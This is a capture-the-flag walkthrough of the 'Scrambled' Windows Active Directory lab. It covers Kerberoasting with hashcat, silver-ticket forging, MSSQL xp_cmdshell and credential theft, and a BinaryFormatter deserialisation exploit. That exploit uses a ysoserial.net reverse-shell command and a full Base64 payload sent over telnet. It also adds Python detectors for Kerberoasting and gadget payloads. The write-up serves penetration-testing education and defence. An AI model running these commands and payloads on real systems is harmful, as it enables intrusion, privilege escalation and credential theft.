# Scrambled

<figure><img src="/files/m0BZX39D7zKoA71JktT6" alt=""><figcaption></figcaption></figure>

**Difficulty:** Medium\
**OS:** Windows (Active Directory)\
**IP:** 10.129.3.74

***

### Enumeration

#### Nmap

The large number of open ports is typical of a Windows domain controller.

```bash
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.3.74 -sCV   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:33 -0400
Nmap scan report for 10.129.3.74
Host is up (0.21s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-13 05:33:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.3.74:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-13T05:19:22
|_Not valid after:  2056-03-13T05:19:22
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-13T05:34:45
|_  start_date: N/A
```

Port 4411, which does not appear in the default scan above, hosts an unknown service. Connecting with `telnet` shows a banner (`SCRAMBLECORP_ORDERS_V1.0.3;`), but no valid commands are known yet; this will be revisited during privilege escalation.

#### IIS — Port 80

Browsing to `http://scrm.local` reveals the Scramble Corp intranet site.

**IT Services tab:** A notice states that NTLM authentication has been disabled across the entire network following a security breach, and that Kerberos is to be used instead.

**Contacting IT Support page:** A screenshot of a Command Prompt window is shown as an example of how to collect network information for a support ticket. The file path visible in the screenshot reveals a username, `ksimpson`.

<figure><img src="/files/pZqVxPhE3lmjgvBq4sW7" alt=""><figcaption></figcaption></figure>

The site also states that NTLM has been turned off, which the `nxc smb` output in the next section confirms (`NTLM:False`).

#### SMB Enumeration

The password for `ksimpson` turns out to be the same as the username. SMB shares are then enumerated with `nxc` using Kerberos authentication (`-k`); a TGT is obtained with `kinit`, and `smbclient` connects to the `Public` share with Kerberos required:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ nxc smb 10.129.3.74 -u 'ksimpson' -p 'ksimpson' -k --shares
SMB         10.129.3.74     445    DC1              [*]  x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.129.3.74     445    DC1              [+] scrm.local\ksimpson:ksimpson 
SMB         10.129.3.74     445    DC1              [*] Enumerated shares
SMB         10.129.3.74     445    DC1              Share           Permissions     Remark
SMB         10.129.3.74     445    DC1              -----           -----------     ------
SMB         10.129.3.74     445    DC1              ADMIN$                          Remote Admin
SMB         10.129.3.74     445    DC1              C$                              Default share
SMB         10.129.3.74     445    DC1              HR                              
SMB         10.129.3.74     445    DC1              IPC$            READ            Remote IPC
SMB         10.129.3.74     445    DC1              IT                              
SMB         10.129.3.74     445    DC1              NETLOGON        READ            Logon server share 
SMB         10.129.3.74     445    DC1              Public          READ            
SMB         10.129.3.74     445    DC1              Sales                           
SMB         10.129.3.74     445    DC1              SYSVOL          READ            Logon server share 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit ksimpson          
Password for ksimpson@SCRM.LOCAL: 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ smbclient //dc1.scrm.local/Public -U ksimpson --use-kerberos=required
Password for [WORKGROUP\ksimpson]:
smb: \> ls
  .                                   D        0  Thu Nov  4 18:23:19 2021
  ..                                  D        0  Thu Nov  4 18:23:19 2021
  Network Security Changes.pdf        A   630106  Thu Nov  4 18:20:49 2021
smb: \> get "Network Security Changes.pdf"
getting file \Network Security Changes.pdf of size 630106 as Network
```

The `Public` share is readable and contains a single file, `Network Security Changes.pdf`. The PDF is an internal memo confirming that NTLM has been disabled.

***

### Kerberoasting

Service accounts are assigned Service Principal Names (SPNs) in Active Directory. Any domain user can request a Kerberos service ticket for an SPN, which is encrypted with the service account's password hash. This ticket can be taken offline and cracked — an attack known as **Kerberoasting**.

Impacket's `GetUserSPNs.py` is used with Kerberos authentication (`-k`). Since NTLM is disabled, the domain controller must be given by FQDN via `-dc-host` rather than by IP via `-dc-ip`; the first attempt below fails for exactly that reason:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-ip 10.129.3.74 scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-host dc1.scrm.local scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2026-03-13 01:19:20.331562             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2026-03-13 01:19:20.331562             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea461b71c199ae8457cd6454b7dc245$d3...SNIP...bb492ac6353dc468705fde31f47dc47553b797bcb70afe66c82137355d6ebc6de029fadba
```

A TGS hash for the `sqlsvc` account is obtained. The hash is cracked with `hashcat`:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ hashcat -m 13100 sqlsvchash.txt /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea...SNIP...iojc8d4cb071ee:Pegasus60
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1...b071ee
Time.Started.....: Fri Mar 13 02:38:15 2026 (8 secs)
Time.Estimated...: Fri Mar 13 02:38:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1339.3 kH/s (1.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10731520/14344385 (74.81%)
Rejected.........: 0/10731520 (0.00%)
Restore.Point....: 10727424/14344385 (74.78%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Petey55 -> Pastillez
Hardware.Mon.#01.: Util: 73%
```

The plaintext password for `sqlsvc` is **`Pegasus60`**.
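
From the defender's side, the request that produced the hash above is visible on the domain controller as event 4769 with ticket encryption type `0x17` (etype 23). The following is an added detection example, not part of the write-up, run over constructed 4769 records: the field names follow the 4769 schema, but the records and the `backupsvc` account are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# "Ticket Encryption Type" value as logged in Windows event 4769.
RC4_HMAC = 0x17   # etype 23: the type behind "$krb5tgs$23$" hashes, crackable offline

# Constructed sample of 4769 events as a SIEM might export them (not real logs).
# ksimpson asks for RC4 tickets to two user SPN accounts; the DC1$ and miscsvc
# requests use AES and are benign. "backupsvc" is an invented service account.
SAMPLE_EVENTS = [
    {"time": "2026-03-13T05:19:20Z", "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.16.5", "Status": "0x0"},
    {"time": "2026-03-13T05:19:21Z", "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "backupsvc", "TicketEncryptionType": "0x17",
     "IpAddress": "10.10.16.5", "Status": "0x0"},
    {"time": "2026-03-13T05:19:22Z", "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12",
     "IpAddress": "10.10.16.5", "Status": "0x0"},
    {"time": "2026-03-13T05:30:00Z", "TargetUserName": "miscsvc@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12",
     "IpAddress": "10.129.3.74", "Status": "0x0"},
]


def is_roast_candidate(ev: dict) -> bool:
    """An issued RC4 service ticket for a user-account SPN (not a machine
    account, not krbtgt) has the shape of a Kerberoast request."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    if ev.get("Status", "0x0") != "0x0":      # failed requests yield no ticket
        return False
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def find_kerberoasting(events, window=timedelta(minutes=10), min_services=1):
    """Group candidate requests by requesting account and report accounts that
    obtained RC4 tickets for at least `min_services` distinct SPN accounts
    inside any `window`. Where RC4 is disabled domain-wide, min_services=1 is
    right (one RC4 ticket is already anomalous); otherwise raise it."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            t = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
            by_user[ev["TargetUserName"]].append((t, ev["ServiceName"], ev["IpAddress"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _, _) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - t0 <= window]
            services = sorted({r[1] for r in in_window})
            if len(services) >= min_services:
                alerts[user] = {"services": services,
                                "sources": sorted({r[2] for r in in_window})}
                break
    return alerts


if __name__ == "__main__":
    for user, info in find_kerberoasting(SAMPLE_EVENTS, min_services=2).items():
        print(f"possible Kerberoasting by {user}: {info}")
```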

***

### Foothold — Silver Ticket Attack

Although we now have the password for `sqlsvc`, we cannot simply authenticate to MSSQL as that account and gain useful access. However, because `sqlsvc` is the service account running the MSSQL service and we know its password, we can perform a **silver ticket attack**.

A silver ticket is a forged Kerberos service ticket (TGS) encrypted with the service account's own long-term key, which for RC4 is the NT hash of its password. Unlike a golden ticket, it never involves the KDC: the ticket is forged entirely offline and presented directly to the target service, impersonating any user (including `Administrator`). Because no TGS-REQ is ever sent, the domain controller logs no 4769 event for it; the only trace is the logon recorded on the service host itself.

Three pieces of information are needed:

1. The **NTLM hash** of `sqlsvc`'s password
2. The **domain SID**
3. The **SPN** of the MSSQL service

#### Step 1 — Derive the NTLM Hash

The NT hash (commonly called the NTLM hash) is the MD4 digest of the UTF-16LE encoding of the password:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ python3 -c "import hashlib,binascii; print(binascii.hexlify(hashlib.new('md4', 'Pegasus60'.encode('utf-16le')).digest()).decode())"
b999a16500b87d17ec7f2e2a68778f05
```

#### Step 2 — Retrieve the Domain SID

`getPac.py` from Impacket is used to extract the domain SID:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ getPac.py -targetUser sqlsvc SCRM.LOCAL/ksimpson:ksimpson
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
...SNIP...
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
```

#### Step 3 — Forge the Silver Ticket

`ticketer.py` from Impacket is used to forge a TGS ticket for the `Administrator` user against the MSSQL SPN:

```bash
┌──(kali㉿kali)-[~]
└─$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain SCRM.LOCAL -spn MSSQLSvc/dc1.scrm.local Administrator 
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SCRM.LOCAL/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```

#### Step 4 — Connect to MSSQL

The forged ticket is exported via `KRB5CCNAME` and used to authenticate to the MSSQL service with Impacket's `mssqlclient.py` (`-k -no-pass`):

```bash
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
~/.local/share/pipx/venvs/impacket/bin/mssqlclient.py -k -no-pass dc1.scrm.local
```

#### Database Enumeration

We are now connected to MSSQL as `Administrator` (`dbo` in `master`). `xp_cmdshell` is enabled to confirm the execution context; note that OS commands run as `scrm\sqlsvc`, the service account, not as the impersonated `Administrator`:

```bash
SQL (SCRM\administrator  dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> EXEC xp_cmdshell 'whoami';
output        
-----------   
scrm\sqlsvc   
NULL 
```

The databases are listed:

```bash
SQL (SCRM\administrator  dbo@master)> SELECT name FROM master.dbo.sysdatabases;
name         
----------   
master       
tempdb       
model        
msdb         
ScrambleHR
```

The `ScrambleHR` database is interesting. Its tables are enumerated:

```bash
SQL (SCRM\administrator  dbo@master)> USE ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator  dbo@ScrambleHR)> SELECT * FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
ScrambleHR      dbo            Employees    b'BASE TABLE'   
ScrambleHR      dbo            UserImport   b'BASE TABLE'   
ScrambleHR      dbo            Timesheets   b'BASE TABLE'
```

The `UserImport` table contains credentials:

```bash
SQL (SCRM\administrator  dbo@ScrambleHR)> SELECT * FROM UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0  
```

***

### User Flag

The credentials `MiscSvc:ScrambledEggs9900` are used to connect via WinRM using `evil-winrm` with Kerberos authentication:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit MiscSvc@SCRM.LOCAL
Password for MiscSvc@SCRM.LOCAL: 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -r SCRM.LOCAL

*Evil-WinRM* PS C:\Users\miscsvc\Documents> type ../Desktop/user.txt
0d9exxxxxxxxxxxxxxxxxxxxxxxxxxx907c
```

***

### Privilege Escalation — Insecure Deserialisation (Port 4411)

During enumeration as `MiscSvc`, the `IT` share (`C:\Shares\IT`) turns out to contain a .NET client application for the port 4411 service:

```bash
*Evil-WinRM* PS C:\Shares\IT\Apps\Sales Order Client> ls
    Directory: C:\Shares\IT\Apps\Sales Order Client

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/5/2021   8:52 PM          86528 ScrambleClient.exe
-a----        11/5/2021   8:52 PM          19456 ScrambleLib.dll
```

#### Reverse Engineering ScrambleLib.dll

The DLL is decompiled using dnSpy. Analysis reveals:

**1. Hardcoded developer authentication bypass:**\
The `Logon()` method in the `ScrambleNetClient` class contains a bypass: if the username is `scrmdev`, authentication is skipped entirely.

```csharp
if (string.Compare(Username, "scrmdev", true) == 0)
{
    Log.Write("Developer logon bypass used");
    result = true;
}
```

**2. Custom TCP wire protocol:**

Commands are sent as newline-terminated ASCII strings in the format `CODE;PARAMETER\n`. The server listens on port 4411 and responds to commands such as `LIST_ORDERS` and `UPLOAD_ORDER`.

```csharp
// Connects via raw TCP, expects a banner on connection
TcpClient tcpClient = new TcpClient();
tcpClient.Connect(this.Server, this.Port);

// Commands are sent as: "CODE;PARAMETER\n"
string text = ScrambleNetRequest.GetCodeFromMessageType(Request.Type) + ";" + Request.Parameter + "\n";
streamWriter.Write(text);
```

**3. Insecure BinaryFormatter deserialisation:**\
The `UPLOAD_ORDER` command causes the server to deserialise a Base64-encoded payload using `BinaryFormatter.Deserialize()` with no validation:

```csharp
// Client side: serializes a SalesOrder object to Base64 using BinaryFormatter
// (the MemoryStream setup is abbreviated in the decompiled listing)
public string SerializeToBase64() {
    MemoryStream memoryStream = new MemoryStream();
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    binaryFormatter.Serialize(memoryStream, this);
    return Convert.ToBase64String(memoryStream.ToArray());
}

// Server side: deserializes attacker-controlled Base64 input. Whatever types
// the stream names are instantiated before the cast to SalesOrder is attempted.
public static SalesOrder DeserializeFromBase64(string Base64) {
    byte[] buffer = Convert.FromBase64String(Base64);
    MemoryStream memoryStream = new MemoryStream(buffer);
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    return (SalesOrder)binaryFormatter.Deserialize(memoryStream); // ← vulnerable
}
```

`BinaryFormatter` is an inherently unsafe deserialiser: the stream itself names the types to instantiate, so any type reachable by the application can be constructed during deserialisation, which is what gadget-chain payloads exploit. Microsoft treats it as unfixable; it is marked obsolete, disabled by default from .NET 7, and removed from the runtime in .NET 9. The only real remediation is to replace it with a format that carries no type information, such as `System.Text.Json` deserialising into a fixed target type.
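
As an added defender-side example (not part of the write-up or of ScrambleLib), a small inspector for `UPLOAD_ORDER` lines of the port 4411 protocol: it decodes the Base64 parameter, checks for the BinaryFormatter stream header, and looks for known gadget type names, following nested Base64 strings the way the WindowsIdentity chain nests a second stream. The gadget list is illustrative, the sample messages are constructed, and `ScrambleLib.SalesOrder` is an assumed type name.

```python
import base64
import re

# Fixed SerializationHeaderRecord that opens every BinaryFormatter stream
# (record type 0, root id 1, header id -1, version 1.0). Its Base64 form is the
# "AAEAAAD/////AQAAAAAAAAA" prefix visible in the write-up's payload.
BF_MAGIC = bytes.fromhex("0001000000ffffffff0100000000000000")

# Illustrative type names from public gadget chains; the write-up's payload
# carries the first two and nests a second stream containing the other two.
GADGET_TYPES = (
    b"System.Security.Principal.WindowsIdentity",
    b"System.Security.Claims.ClaimsIdentity",
    b"Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties",
    b"ObjectDataProvider",
)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def scan_stream(blob: bytes, depth: int = 0, max_depth: int = 3) -> set:
    """Gadget type names present in a stream, following Base64 strings embedded
    in it (the WindowsIdentity chain smuggles a second stream that way)."""
    found = {t.decode() for t in GADGET_TYPES if t in blob}
    if depth < max_depth:
        for m in B64_RUN.finditer(blob):
            try:
                inner = base64.b64decode(m.group(0), validate=True)
            except ValueError:
                continue
            found |= scan_stream(inner, depth + 1, max_depth)
    return found


def inspect_order_line(line: str) -> dict:
    """Classify one 'CODE;PARAMETER' line of the port 4411 protocol. A
    BinaryFormatter stream is normal for UPLOAD_ORDER (the client serialises a
    SalesOrder that way); gadget type names inside it are the alert."""
    code, _, param = line.rstrip("\r\n").partition(";")
    verdict = {"command": code, "binaryformatter": False, "gadgets": []}
    if code != "UPLOAD_ORDER" or not param:
        return verdict
    try:
        blob = base64.b64decode(param, validate=True)
    except ValueError:
        return verdict
    verdict["binaryformatter"] = blob.startswith(BF_MAGIC)
    verdict["gadgets"] = sorted(scan_stream(blob))
    return verdict


# --- constructed samples (not the write-up's real payload) -------------------
def _lps(s: bytes) -> bytes:
    """LengthPrefixedString: 7-bit variable-length size, then the bytes."""
    n, out = len(s), b""
    while n >= 0x80:
        out += bytes([(n & 0x7F) | 0x80]); n >>= 7
    return out + bytes([n]) + s


def _class_record(name: bytes) -> bytes:
    return b"\x04\x01\x00\x00\x00" + _lps(name)   # ClassWithMembersAndTypes, id 1


# Benign order; "ScrambleLib.SalesOrder" is an assumed fully qualified name.
BENIGN_ORDER = "UPLOAD_ORDER;" + base64.b64encode(
    BF_MAGIC + _class_record(b"ScrambleLib.SalesOrder")).decode()
# Nested shape of the WindowsIdentity chain: an outer WindowsIdentity object
# whose string member is the Base64 of a second stream naming the real gadget.
_INNER = BF_MAGIC + _class_record(GADGET_TYPES[2]) + _lps(b"<ObjectDataProvider/>")
_OUTER = BF_MAGIC + _class_record(GADGET_TYPES[0]) + b"\x06\x02\x00\x00\x00" + _lps(base64.b64encode(_INNER))
GADGET_ORDER = "UPLOAD_ORDER;" + base64.b64encode(_OUTER).decode()
```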

#### Crafting the Payload

`nc64.exe` is first uploaded to the target via the existing `MiscSvc` WinRM session:

```bash
*Evil-WinRM* PS C:\Users\miscsvc\music> upload nc64.exe

Info: Uploading /home/kali/Documents/scrambled/nc64.exe to 

C:\Users\miscsvc\music\nc64.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!
```

A malicious serialised payload is generated using `ysoserial.net` with the `WindowsIdentity` gadget chain, which triggers command execution during deserialisation:

```powershell
E:\gg2\Release>ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\users\miscsvc\music\nc64.exe -e powershell 10.10.16.5 4444"
```

A listener is started:

```bash
┌──(kali㉿kali)-[~/Documents/scrambled/Release]
└─$ rlwrap nc -lvnp 4444
```

The payload is delivered to the server via telnet. The protocol flow is:

1. Connect — server responds with `SCRAMBLECORP_ORDERS_V1.0.3;`
2. No explicit login is needed; the `UPLOAD_ORDER` command is sent directly with the Base64 payload

```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ telnet scrm.local 4411
Trying 10.129.3.74...
Connected to scrm.local.
Escape character is '^]'.
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUVNNlhIVnpaWEp6WEcxcGMyTnpkbU5jYlhWemFXTmNibU0yTkM1bGVHVWdMV1VnY0c5M1pYSnphR1ZzYkNBeE1DNHhNQzR4Tmk0MUlEUTBORFFpSUZOMFlXNWtZWEprUlhKeWIzSkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRk4wWVc1a1lYSmtUM1YwY0hWMFJXNWpiMlJwYm1jOUludDRPazUxYkd4OUlpQlZjMlZ5VG1GdFpUMGlJaUJRWVhOemQyOXlaRDBpZTNnNlRuVnNiSDBpSUVSdmJXRnBiajBpSWlCTWIyRmtWWE5sY2xCeWIyWnBiR1U5SWtaaGJITmxJaUJHYVd4bFRtRnRaVDBpWTIxa0lpQXZQZzBLSUNBZ0lDQWdQQzl6WkRwUWNtOWpaWE56TGxOMFlYSjBTVzVtYno0TkNpQWdJQ0E4TDNOa09sQnliMk5sYzNNK0RRb2dJRHd2VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJK0N3PT0L
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
SESSION_TIMED_OUT;
Connection closed by foreign host.
```

Despite the error response from the server (the object cannot be cast to `SalesOrder`), the gadget chain executes during deserialisation before the cast, so the payload fires regardless.

#### Root Shell

```bash
connect to [10.10.16.5] from (UNKNOWN) [10.129.3.74] 61682
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
0a03xxxxxxxxxxxxxxxxxxxx6766
```

A shell is obtained as `NT AUTHORITY\SYSTEM` (the context of the service running the sales order application), and the root flag is retrieved.

***

### Attack Chain Summary

| Step                | Technique                              | Outcome                                                      |
| ------------------- | -------------------------------------- | ------------------------------------------------------------ |
| Web enumeration     | OSINT / screenshot analysis            | Discovered username `ksimpson` and password policy           |
| SMB access          | Kerberos auth with `ksimpson:ksimpson` | Read `Public` share; obtained `Network Security Changes.pdf` |
| Kerberoasting       | `GetUserSPNs.py` + hashcat             | Cracked `sqlsvc` hash → `Pegasus60`                          |
| Silver ticket       | `ticketer.py` (Impacket)               | Forged TGS as `Administrator` on MSSQL                       |
| DB enumeration      | `mssqlclient.py`                       | Found `MiscSvc:ScrambledEggs9900` in `UserImport` table      |
| WinRM shell         | `evil-winrm` + Kerberos                | Shell as `MiscSvc`; user flag                                |
| .NET RE             | dnSpy analysis of `ScrambleLib.dll`    | Discovered dev bypass + insecure `BinaryFormatter`           |
| Deserialisation RCE | `ysoserial.net` + telnet               | Shell as `NT AUTHORITY\SYSTEM`; root flag                    |

